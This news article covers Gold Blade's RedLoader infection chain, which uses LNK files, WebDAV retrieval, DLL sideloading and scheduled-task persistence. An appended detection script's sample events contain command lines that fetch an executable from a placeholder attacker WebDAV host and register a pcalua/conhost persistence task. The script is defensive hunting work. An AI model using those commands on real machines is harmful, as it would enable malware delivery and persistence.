Gold Blade threat actor upgrades infection chain for RedLoader malware



Cybersecurity researchers at Sophos have uncovered a new infection chain linked to the Gold Blade cybercriminal group used for the delivery of the custom RedLoader malware. The latest campaign leverages a previously unreported method of initial access, combining multiple tactics that Gold Blade has used separately until now.

The attack chain begins with a seemingly legitimate cover letter PDF sent to a target via a third-party job site. Hidden within the PDF is a malicious link that downloads a ZIP archive to the victim's system. Inside the archive is a LNK file, disguised as a PDF, that launches the infection process.

Upon execution, the LNK file launches conhost.exe, which uses WebDAV to connect to an attacker-controlled CloudFlare Workers domain and retrieve two files: a signed, renamed copy of Adobe's ADNotificationManager.exe masquerading as a resume, and a malicious DLL named netutils.dll, which is the RedLoader stage 1 payload.

Because the renamed Adobe executable loads netutils.dll from its own directory, running it sideloads the malicious DLL and begins the RedLoader infection chain. Once active, the stage 1 payload creates a scheduled task that executes a second-stage payload retrieved from another CloudFlare Workers domain.

RedLoader stage 2 arrives as a standalone executable. The scheduled task leverages both PCALua.exe and conhost.exe to execute the second-stage malware, which then establishes communication with a command-and-control (C2) server.
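The chain above gives a defender four observable pivots: conhost.exe reaching a WebDAV share on a Workers domain, a signed binary running under a name other than its original file name, netutils.dll loaded from outside System32 by that binary, and a scheduled task whose action chains pcalua.exe and conhost.exe. The following script is an added example, not Sophos' detection content or Gold Blade tooling; it runs those checks over constructed Sysmon-style process-creation (EID 1) and image-load (EID 7) records. The hostnames, paths, command lines, task name and field names are assumptions made for illustration, not indicators from the report.

```python
"""Hunting heuristics for the Gold Blade / RedLoader chain (added example).

The events below are constructed to resemble Sysmon EID 1 / EID 7 records;
every hostname, path and command line is an assumption, not a real IOC.
"""
import ntpath
import re

# Constructed sample telemetry; field names follow Sysmon naming (assumed).
EVENTS = [
    {   # LNK (disguised as a PDF) launches conhost.exe, which pulls the
        # next stage from an attacker WebDAV share on a Workers domain.
        "id": 1, "Image": r"C:\Windows\System32\conhost.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": r"conhost.exe --headless \\example-12ab.workers.dev@SSL\DavWWWRoot\resume.exe",
        "OriginalFileName": "CONHOST.EXE",
    },
    {   # Signed Adobe binary renamed to look like a resume (assumed name).
        "id": 1, "Image": r"C:\Users\victim\Downloads\resume.exe",
        "ParentImage": r"C:\Windows\System32\conhost.exe",
        "CommandLine": r"C:\Users\victim\Downloads\resume.exe",
        "OriginalFileName": "ADNotificationManager.exe",
        "Signature": "Adobe Inc.",
    },
    {   # netutils.dll sideloaded from the binary's own directory.
        "id": 7, "Image": r"C:\Users\victim\Downloads\resume.exe",
        "ImageLoaded": r"C:\Users\victim\Downloads\netutils.dll",
        "Signed": "false",
    },
    {   # Stage 1 registers a task that launches stage 2 via pcalua.exe/conhost.exe.
        "id": 1, "Image": r"C:\Windows\System32\schtasks.exe",
        "ParentImage": r"C:\Users\victim\Downloads\resume.exe",
        "CommandLine": (r'schtasks /create /tn "Updater" /sc minute /mo 30 /tr '
                        r'"C:\Windows\System32\pcalua.exe -a conhost.exe '
                        r'C:\Users\victim\AppData\Local\Temp\stage2.exe"'),
        "OriginalFileName": "schtasks.exe",
    },
    {   # Benign baseline: the legitimate netutils.dll loaded from System32.
        "id": 7, "Image": r"C:\Windows\System32\svchost.exe",
        "ImageLoaded": r"C:\Windows\System32\netutils.dll",
        "Signed": "true",
    },
]

# Windows WebDAV UNC form: \\host@SSL\DavWWWRoot\... (TLS) 
WEBDAV_UNC = re.compile(r"\\\\[^\\\s]+@SSL\\DavWWWRoot\\", re.IGNORECASE)
WORKERS_HOST = re.compile(r"\.workers\.dev\b", re.IGNORECASE)
SYSTEM32 = r"c:\windows\system32"


def base(path):
    return ntpath.basename(path).lower()


def is_disguised_lnk(filename):
    """A .lnk whose name carries a decoy document extension (e.g. x.pdf.lnk)."""
    name = filename.lower()
    return name.endswith(".lnk") and re.search(r"\.(pdf|docx?|xlsx?|txt)\.lnk$", name) is not None


def rule_conhost_webdav_workers(e):
    cl = e.get("CommandLine", "")
    return (e["id"] == 1 and base(e["Image"]) == "conhost.exe"
            and WEBDAV_UNC.search(cl) is not None and WORKERS_HOST.search(cl) is not None)


def rule_renamed_signed_binary(e):
    """Signed executable whose on-disk name differs from its PE OriginalFileName."""
    orig = e.get("OriginalFileName")
    return (e["id"] == 1 and bool(e.get("Signature")) and bool(orig)
            and base(e["Image"]) != orig.lower())


def rule_sideloaded_netutils(e):
    if e["id"] != 7 or base(e["ImageLoaded"]) != "netutils.dll":
        return False
    loaded_dir = ntpath.dirname(e["ImageLoaded"]).lower()
    # Loaded from the process's own directory rather than System32 => sideload.
    return loaded_dir != SYSTEM32 and loaded_dir == ntpath.dirname(e["Image"]).lower()


def rule_task_pcalua_conhost(e):
    cl = e.get("CommandLine", "").lower()
    return (e["id"] == 1 and base(e["Image"]) == "schtasks.exe" and "/create" in cl
            and "pcalua.exe" in cl and "conhost.exe" in cl)


RULES = {
    "conhost_webdav_workers": rule_conhost_webdav_workers,
    "renamed_signed_binary": rule_renamed_signed_binary,
    "sideloaded_netutils": rule_sideloaded_netutils,
    "task_pcalua_conhost": rule_task_pcalua_conhost,
}


def hunt(events):
    """Return (rule_name, event_index) pairs for every event that trips a rule."""
    return [(name, i) for i, e in enumerate(events) for name, rule in RULES.items() if rule(e)]


if __name__ == "__main__":
    for name, idx in hunt(EVENTS):
        print(f"{name}: event {idx} -> {EVENTS[idx].get('CommandLine') or EVENTS[idx].get('ImageLoaded')}")
```

Each rule is deliberately narrow so that the benign System32 load of netutils.dll does not fire; in a real deployment the renamed-signed-binary check is the noisiest of the four and is best scoped to user-writable directories, while the Workers-domain and pcalua.exe/conhost.exe task checks are rare enough in normal telemetry to alert on directly.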

“The July activity shows how threat actors can combine prior techniques to modify their attack chain and bypass defenses. Gold Blade continues to rely heavily on LNK files that impersonate other file types,” Sophos has warned.
